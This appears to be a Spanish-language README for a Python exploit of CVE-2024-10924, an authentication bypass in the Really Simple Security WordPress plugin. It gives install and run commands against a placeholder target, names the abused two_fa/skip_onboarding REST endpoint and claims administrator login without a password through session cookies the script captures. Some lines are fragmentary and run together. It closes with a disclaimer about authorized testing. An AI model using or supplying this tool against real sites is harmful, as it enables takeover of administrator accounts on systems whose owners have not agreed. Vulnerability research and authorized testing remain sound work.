
Really Simple Security (Free, Pro y Pro Multisite) 9.0.0 - 9.1.1.1 - Omisión de Autenticación
Really Simple Security (Free, Pro y Pro Multisite) 9.0.0 - 9.1.1.1 - Bypass de autenticación
Este script explota una vulnerabilidad en el plugin Really Simple Security (versiones 9.0.0 - 9.1.1.1) para WordPress. El fallo permite un bypass de autenticación debido a un manejo inadecuado de errores en la función check_login_and_get_user de la API de autenticación de dos factores.
Con este exploit, un atacante puede iniciar sesión como cualquier usuario (por ejemplo, administrador) si 2FA está habilitado. Una vez autenticado, el script lanza automáticamente una sesión de navegador con las cookies de sesión obtenidas.
Antes de ejecutar el script, instala las dependencias necesarias:
pip install requests selenium webdriver-manager
python CVE-2024-10924.py -u http://TARGET-WEBSITE.com/
/wp-json/reallysimplessl/v1/two_fa/skip_onboarding
/wp-admin/, otorgando acceso de administrador sin necesidad de contraseña.usage: CVE-2024-10924.py [-h] -u URL
WordPress Login Exploit | Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication
Bypass
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL
Este script está destinado únicamente a fines educativos y evaluaciones de seguridad autorizadas. El uso indebido de este script puede conllevar consecuencias legales. Siempre obtén la autorización adecuada antes de probar en cualquier sistema.